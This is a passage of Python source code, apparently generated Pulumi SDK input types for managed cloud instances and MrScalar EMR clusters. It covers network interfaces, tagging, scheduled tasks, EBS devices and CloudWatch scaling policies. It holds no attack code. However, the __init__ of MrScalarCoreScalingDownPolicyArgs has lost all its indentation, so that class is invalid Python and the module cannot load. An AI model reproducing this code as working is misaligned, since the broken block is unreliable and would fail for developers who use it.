    @pulumi.getter(name="deviceIndex")
    def device_index(self) -> pulumi.Input[str]:
        """The position of the network interface in the attachment order. A primary network interface has a device index of 0. If you specify a network interface when launching an instance, you must specify the device index."""
        return pulumi.get(self, "device_index")

    @device_index.setter
    def device_index(self, value: pulumi.Input[str]):
        pulumi.set(self, "device_index", value)

    @property
    @pulumi.getter(name="associateIpv6Address")
    def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:
        """Indicates whether to assign an IPv6 address. Amazon EC2 chooses the IPv6 addresses from the range of the subnet. Default: `false`"""
        return pulumi.get(self, "associate_ipv6_address")

    @associate_ipv6_address.setter
    def associate_ipv6_address(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "associate_ipv6_address", value)

    @property
    @pulumi.getter(name="associatePublicIpAddress")
    def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
        """Indicates whether to assign a public IPv4 address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one. You cannot specify more than one network interface in the request. If launching into a default subnet, the default value is true."""
        return pulumi.get(self, "associate_public_ip_address")

    @associate_public_ip_address.setter
    def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "associate_public_ip_address", value)
@pulumi.input_type
class ManagedInstanceResourceTagSpecificationArgs:
    """Flags controlling which related resources are tagged."""

    def __init__(__self__, *,
                 should_tag_amis: Optional[pulumi.Input[bool]] = None,
                 should_tag_enis: Optional[pulumi.Input[bool]] = None,
                 should_tag_snapshots: Optional[pulumi.Input[bool]] = None,
                 should_tag_volumes: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[bool] should_tag_amis: Tag specification for AMI resources.
        :param pulumi.Input[bool] should_tag_enis: Tag specification for ENI resources.
        :param pulumi.Input[bool] should_tag_snapshots: Tag specification for Snapshot resources.
        :param pulumi.Input[bool] should_tag_volumes: Tag specification for Volume resources.
        """
        # All flags are optional; store only those explicitly provided.
        flags = {
            "should_tag_amis": should_tag_amis,
            "should_tag_enis": should_tag_enis,
            "should_tag_snapshots": should_tag_snapshots,
            "should_tag_volumes": should_tag_volumes,
        }
        for attr_name, flag in flags.items():
            if flag is not None:
                pulumi.set(__self__, attr_name, flag)

    @property
    @pulumi.getter(name="shouldTagAmis")
    def should_tag_amis(self) -> Optional[pulumi.Input[bool]]:
        """Tag specification for AMI resources."""
        return pulumi.get(self, "should_tag_amis")

    @should_tag_amis.setter
    def should_tag_amis(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_amis", value)

    @property
    @pulumi.getter(name="shouldTagEnis")
    def should_tag_enis(self) -> Optional[pulumi.Input[bool]]:
        """Tag specification for ENI resources."""
        return pulumi.get(self, "should_tag_enis")

    @should_tag_enis.setter
    def should_tag_enis(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_enis", value)

    @property
    @pulumi.getter(name="shouldTagSnapshots")
    def should_tag_snapshots(self) -> Optional[pulumi.Input[bool]]:
        """Tag specification for Snapshot resources."""
        return pulumi.get(self, "should_tag_snapshots")

    @should_tag_snapshots.setter
    def should_tag_snapshots(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_snapshots", value)

    @property
    @pulumi.getter(name="shouldTagVolumes")
    def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:
        """Tag specification for Volume resources."""
        return pulumi.get(self, "should_tag_volumes")

    @should_tag_volumes.setter
    def should_tag_volumes(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_tag_volumes", value)
@pulumi.input_type
class ManagedInstanceRevertToSpotArgs:
    """Revert-to-spot policy for a managed instance."""

    def __init__(__self__, *,
                 perform_at: pulumi.Input[str]):
        """
        :param pulumi.Input[str] perform_at: Valid values: `"always"`, `"never"`, `"timeWindow"`. Default `"never"`.
        """
        # `perform_at` is the only (required) field of this block.
        pulumi.set(__self__, "perform_at", perform_at)

    @property
    @pulumi.getter(name="performAt")
    def perform_at(self) -> pulumi.Input[str]:
        """Valid values: `"always"`, `"never"`, `"timeWindow"`. Default `"never"`."""
        return pulumi.get(self, "perform_at")

    @perform_at.setter
    def perform_at(self, value: pulumi.Input[str]):
        pulumi.set(self, "perform_at", value)
@pulumi.input_type
class ManagedInstanceScheduledTaskArgs:
    """A scheduled task (pause/resume/recycle) for a managed instance."""

    def __init__(__self__, *,
                 task_type: pulumi.Input[str],
                 cron_expression: Optional[pulumi.Input[str]] = None,
                 frequency: Optional[pulumi.Input[str]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None,
                 start_time: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] task_type: The task type to run. Valid values: `"pause"`, `"resume"`, `"recycle"`.
        :param pulumi.Input[str] cron_expression: A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of ‘frequency’ or ‘cronExpression’ should be used at a time.
               Example: `"0 1 * * *"`.
        :param pulumi.Input[str] frequency: Set frequency for the task. Valid values: "hourly", "daily", "weekly", "continuous".
        :param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When true the task should run when false it should not run.
        :param pulumi.Input[str] start_time: DATETIME in ISO-8601 format. Sets a start time for scheduled actions. If "frequency" or "cronExpression" are not used - the task will run only once at the start time and will then be deleted from the instance configuration.
               Example: `"2019-05-23T10:55:09Z"`
        """
        # The task type is required; the remaining scheduling fields are
        # persisted only when the caller supplied them.
        pulumi.set(__self__, "task_type", task_type)
        optional_fields = {
            "cron_expression": cron_expression,
            "frequency": frequency,
            "is_enabled": is_enabled,
            "start_time": start_time,
        }
        for attr_name, attr_value in optional_fields.items():
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="taskType")
    def task_type(self) -> pulumi.Input[str]:
        """The task type to run. Valid values: `"pause"`, `"resume"`, `"recycle"`."""
        return pulumi.get(self, "task_type")

    @task_type.setter
    def task_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "task_type", value)

    @property
    @pulumi.getter(name="cronExpression")
    def cron_expression(self) -> Optional[pulumi.Input[str]]:
        """
        A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of ‘frequency’ or ‘cronExpression’ should be used at a time.
        Example: `"0 1 * * *"`.
        """
        return pulumi.get(self, "cron_expression")

    @cron_expression.setter
    def cron_expression(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cron_expression", value)

    @property
    @pulumi.getter
    def frequency(self) -> Optional[pulumi.Input[str]]:
        """Set frequency for the task. Valid values: "hourly", "daily", "weekly", "continuous"."""
        return pulumi.get(self, "frequency")

    @frequency.setter
    def frequency(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "frequency", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Describes whether the task is enabled. When true the task should run when false it should not run."""
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="startTime")
    def start_time(self) -> Optional[pulumi.Input[str]]:
        """
        DATETIME in ISO-8601 format. Sets a start time for scheduled actions. If "frequency" or "cronExpression" are not used - the task will run only once at the start time and will then be deleted from the instance configuration.
        Example: `"2019-05-23T10:55:09Z"`
        """
        return pulumi.get(self, "start_time")

    @start_time.setter
    def start_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "start_time", value)
@pulumi.input_type
class ManagedInstanceTagArgs:
    def __init__(__self__, *,
                 key: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] key: Tag's key.
        :param pulumi.Input[str] value: Tag's value.
        """
        if key is not None:
            pulumi.set(__self__, "key", key)
        if value is not None:
            pulumi.set(__self__, "value", value)
    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        """
        Tag's key.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        Tag's value.
        """
        return pulumi.get(self, "value")
    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class MrScalarApplicationArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 args: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 version: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: The application name.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] args: Arguments for EMR to pass to the application.
        :param pulumi.Input[str] version: The version of the application.
        """
        pulumi.set(__self__, "name", name)
        if args is not None:
            pulumi.set(__self__, "args", args)
        if version is not None:
            pulumi.set(__self__, "version", version)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The application name.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def args(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Arguments for EMR to pass to the application.
        """
        return pulumi.get(self, "args")
    @args.setter
    def args(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "args", value)
    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        The version of the application.
        """
        return pulumi.get(self, "version")
    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class MrScalarBootstrapActionsFileArgs:
    """S3 location of the cluster's bootstrap-actions file."""

    def __init__(__self__, *,
                 bucket: pulumi.Input[str],
                 key: pulumi.Input[str]):
        """
        :param pulumi.Input[str] bucket: S3 Bucket name for bootstrap actions.
        :param pulumi.Input[str] key: S3 key for bootstrap actions.
        """
        # Both coordinates are required to locate the object in S3.
        for attr_name, attr_value in (("bucket", bucket), ("key", key)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def bucket(self) -> pulumi.Input[str]:
        """S3 Bucket name for bootstrap actions."""
        return pulumi.get(self, "bucket")

    @bucket.setter
    def bucket(self, value: pulumi.Input[str]):
        pulumi.set(self, "bucket", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """S3 key for bootstrap actions."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)
@pulumi.input_type
class MrScalarConfigurationsFileArgs:
    def __init__(__self__, *,
                 bucket: pulumi.Input[str],
                 key: pulumi.Input[str]):
        """
        :param pulumi.Input[str] bucket: S3 Bucket name for the configurations file.
        :param pulumi.Input[str] key: S3 key for the configurations file.
        """
        pulumi.set(__self__, "bucket", bucket)
        pulumi.set(__self__, "key", key)
    @property
    @pulumi.getter
    def bucket(self) -> pulumi.Input[str]:
        """
        S3 Bucket name for the configurations file.
        """
        return pulumi.get(self, "bucket")
    @bucket.setter
    def bucket(self, value: pulumi.Input[str]):
        pulumi.set(self, "bucket", value)
    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        S3 key for the configurations file.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)
@pulumi.input_type
class MrScalarCoreEbsBlockDeviceArgs:
    def __init__(__self__, *,
                 size_in_gb: pulumi.Input[int],
                 volume_type: pulumi.Input[str],
                 iops: Optional[pulumi.Input[int]] = None,
                 volumes_per_instance: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] size_in_gb: Size of the volume, in GBs.
        :param pulumi.Input[str] volume_type: volume type. Allowed values are 'gp2', 'io1' and others.
        :param pulumi.Input[int] iops: IOPS for the volume. Required in some volume types, such as io1.
        :param pulumi.Input[int] volumes_per_instance: Amount of volumes per instance in the core group.
        """
        pulumi.set(__self__, "size_in_gb", size_in_gb)
        pulumi.set(__self__, "volume_type", volume_type)
        if iops is not None:
            pulumi.set(__self__, "iops", iops)
        if volumes_per_instance is not None:
            pulumi.set(__self__, "volumes_per_instance", volumes_per_instance)
    @property
    @pulumi.getter(name="sizeInGb")
    def size_in_gb(self) -> pulumi.Input[int]:
        """
        Size of the volume, in GBs.
        """
        return pulumi.get(self, "size_in_gb")
    @size_in_gb.setter
    def size_in_gb(self, value: pulumi.Input[int]):
        pulumi.set(self, "size_in_gb", value)
    @property
    @pulumi.getter(name="volumeType")
    def volume_type(self) -> pulumi.Input[str]:
        """
        volume type. Allowed values are 'gp2', 'io1' and others.
        """
        return pulumi.get(self, "volume_type")
    @volume_type.setter
    def volume_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "volume_type", value)
    @property
    @pulumi.getter
    def iops(self) -> Optional[pulumi.Input[int]]:
        """
        IOPS for the volume. Required in some volume types, such as io1.
        """
        return pulumi.get(self, "iops")
    @iops.setter
    def iops(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "iops", value)
    @property
    @pulumi.getter(name="volumesPerInstance")
    def volumes_per_instance(self) -> Optional[pulumi.Input[int]]:
        """
        Amount of volumes per instance in the core group.
        """
        return pulumi.get(self, "volumes_per_instance")
    @volumes_per_instance.setter
    def volumes_per_instance(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "volumes_per_instance", value)
@pulumi.input_type
class MrScalarCoreScalingDownPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
threshold: pulumi.Input[float],
unit: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
statistic: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
:param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
:param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
:param pulumi.Input[str] action_type: The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed.
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
:param pulumi.Input[Mapping[str, Any]] dimensions: A mapping of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
:param pulumi.Input[str] maximum: The maximum to set when scale is needed.
:param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
:param pulumi.Input[str] minimum: The minimum to set when scale is needed.
:param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
:param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
:param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
:param pulumi.Input[str] target: The number of instances to set when scale is needed.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "unit", unit)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if target is not None:
pulumi.set(__self__, "target", target)
    # --- Required policy fields ----------------------------------------------
    # Each @property below reads its stored value via pulumi.get and the paired
    # setter writes it via pulumi.set. Where @pulumi.getter(name=...) is given,
    # it maps the snake_case Python attribute to its camelCase wire name.
    @property
    @pulumi.getter(name="metricName")
    def metric_name(self) -> pulumi.Input[str]:
        """
        The name of the metric in CloudWatch which the statement will be based on.
        """
        return pulumi.get(self, "metric_name")
    @metric_name.setter
    def metric_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "metric_name", value)
    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """
        Must contain the value: `AWS/ElasticMapReduce`.
        """
        return pulumi.get(self, "namespace")
    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)
    @property
    @pulumi.getter(name="policyName")
    def policy_name(self) -> pulumi.Input[str]:
        """
        The name of the policy.
        """
        return pulumi.get(self, "policy_name")
    @policy_name.setter
    def policy_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "policy_name", value)
    @property
    @pulumi.getter
    def threshold(self) -> pulumi.Input[float]:
        """
        The value that the specified statistic is compared to.
        """
        return pulumi.get(self, "threshold")
    @threshold.setter
    def threshold(self, value: pulumi.Input[float]):
        pulumi.set(self, "threshold", value)
    @property
    @pulumi.getter
    def unit(self) -> pulumi.Input[str]:
        """
        The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
        """
        return pulumi.get(self, "unit")
    @unit.setter
    def unit(self, value: pulumi.Input[str]):
        pulumi.set(self, "unit", value)
    # --- Optional policy fields ----------------------------------------------
    # These inputs are Optional[...]; __init__ records each one only when the
    # caller passed a non-None value, so an unset field has no stored value here.
    @property
    @pulumi.getter(name="actionType")
    def action_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
        """
        return pulumi.get(self, "action_type")
    @action_type.setter
    def action_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "action_type", value)
    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """
        The number of instances to add/remove to/from the target capacity when scale is needed.
        """
        return pulumi.get(self, "adjustment")
    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)
    @property
    @pulumi.getter
    def cooldown(self) -> Optional[pulumi.Input[int]]:
        """
        The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
        """
        return pulumi.get(self, "cooldown")
    @cooldown.setter
    def cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cooldown", value)
    @property
    @pulumi.getter
    def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        A mapping of dimensions describing qualities of the metric.
        """
        return pulumi.get(self, "dimensions")
    @dimensions.setter
    def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "dimensions", value)
    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """
        The number of periods over which data is compared to the specified threshold.
        """
        return pulumi.get(self, "evaluation_periods")
    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)
    @property
    @pulumi.getter(name="maxTargetCapacity")
    def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Max target capacity for scale down.
        """
        return pulumi.get(self, "max_target_capacity")
    @max_target_capacity.setter
    def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_target_capacity", value)
    @property
    @pulumi.getter
    def maximum(self) -> Optional[pulumi.Input[str]]:
        """
        The maximum to set when scale is needed.
        """
        return pulumi.get(self, "maximum")
    @maximum.setter
    def maximum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "maximum", value)
    @property
    @pulumi.getter(name="minTargetCapacity")
    def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Min target capacity for scale up.
        """
        return pulumi.get(self, "min_target_capacity")
    @min_target_capacity.setter
    def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_target_capacity", value)
    @property
    @pulumi.getter
    def minimum(self) -> Optional[pulumi.Input[str]]:
        """
        The minimum to set when scale is needed.
        """
        return pulumi.get(self, "minimum")
    @minimum.setter
    def minimum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "minimum", value)
    @property
    @pulumi.getter
    def operator(self) -> Optional[pulumi.Input[str]]:
        """
        The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
        """
        return pulumi.get(self, "operator")
    @operator.setter
    def operator(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "operator", value)
    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """
        The time window in seconds over which the statistic is applied.
        """
        return pulumi.get(self, "period")
    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)
    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """
        The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
        """
        return pulumi.get(self, "statistic")
    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statistic", value)
    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """
        The number of instances to set when scale is needed.
        """
        return pulumi.get(self, "target")
    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarCoreScalingUpPolicyArgs:
    def __init__(__self__, *,
                 metric_name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 policy_name: pulumi.Input[str],
                 threshold: pulumi.Input[float],
                 unit: pulumi.Input[str],
                 action_type: Optional[pulumi.Input[str]] = None,
                 adjustment: Optional[pulumi.Input[str]] = None,
                 cooldown: Optional[pulumi.Input[int]] = None,
                 dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 max_target_capacity: Optional[pulumi.Input[str]] = None,
                 maximum: Optional[pulumi.Input[str]] = None,
                 min_target_capacity: Optional[pulumi.Input[str]] = None,
                 minimum: Optional[pulumi.Input[str]] = None,
                 operator: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 statistic: Optional[pulumi.Input[str]] = None,
                 target: Optional[pulumi.Input[str]] = None):
        """
        Scale-up policy arguments for the core instance group.

        :param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
        :param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
        :param pulumi.Input[str] policy_name: The name of the policy.
        :param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
        :param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
        :param pulumi.Input[str] action_type: The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
        :param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed.
        :param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
        :param pulumi.Input[Mapping[str, Any]] dimensions: A mapping of dimensions describing qualities of the metric.
        :param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
        :param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
        :param pulumi.Input[str] maximum: The maximum to set when scale is needed.
        :param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
        :param pulumi.Input[str] minimum: The minimum to set when scale is needed.
        :param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
        :param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
        :param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
        :param pulumi.Input[str] target: The number of instances to set when scale is needed.
        """
        # Required fields are always recorded, in declaration order.
        for required_name, required_value in (
                ("metric_name", metric_name),
                ("namespace", namespace),
                ("policy_name", policy_name),
                ("threshold", threshold),
                ("unit", unit)):
            pulumi.set(__self__, required_name, required_value)
        # Optional fields are recorded only when the caller supplied a value.
        optional_fields = {
            "action_type": action_type,
            "adjustment": adjustment,
            "cooldown": cooldown,
            "dimensions": dimensions,
            "evaluation_periods": evaluation_periods,
            "max_target_capacity": max_target_capacity,
            "maximum": maximum,
            "min_target_capacity": min_target_capacity,
            "minimum": minimum,
            "operator": operator,
            "period": period,
            "statistic": statistic,
            "target": target,
        }
        for optional_name, optional_value in optional_fields.items():
            if optional_value is not None:
                pulumi.set(__self__, optional_name, optional_value)

    @property
    @pulumi.getter(name="metricName")
    def metric_name(self) -> pulumi.Input[str]:
        """The name of the metric in CloudWatch which the statement will be based on."""
        return pulumi.get(self, "metric_name")

    @metric_name.setter
    def metric_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "metric_name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """Must contain the value: `AWS/ElasticMapReduce`."""
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="policyName")
    def policy_name(self) -> pulumi.Input[str]:
        """The name of the policy."""
        return pulumi.get(self, "policy_name")

    @policy_name.setter
    def policy_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "policy_name", value)

    @property
    @pulumi.getter
    def threshold(self) -> pulumi.Input[float]:
        """The value that the specified statistic is compared to."""
        return pulumi.get(self, "threshold")

    @threshold.setter
    def threshold(self, value: pulumi.Input[float]):
        pulumi.set(self, "threshold", value)

    @property
    @pulumi.getter
    def unit(self) -> pulumi.Input[str]:
        """
        The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
        """
        return pulumi.get(self, "unit")

    @unit.setter
    def unit(self, value: pulumi.Input[str]):
        pulumi.set(self, "unit", value)

    @property
    @pulumi.getter(name="actionType")
    def action_type(self) -> Optional[pulumi.Input[str]]:
        """The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'"""
        return pulumi.get(self, "action_type")

    @action_type.setter
    def action_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "action_type", value)

    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """The number of instances to add/remove to/from the target capacity when scale is needed."""
        return pulumi.get(self, "adjustment")

    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)

    @property
    @pulumi.getter
    def cooldown(self) -> Optional[pulumi.Input[int]]:
        """The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start."""
        return pulumi.get(self, "cooldown")

    @cooldown.setter
    def cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cooldown", value)

    @property
    @pulumi.getter
    def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """A mapping of dimensions describing qualities of the metric."""
        return pulumi.get(self, "dimensions")

    @dimensions.setter
    def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "dimensions", value)

    @property
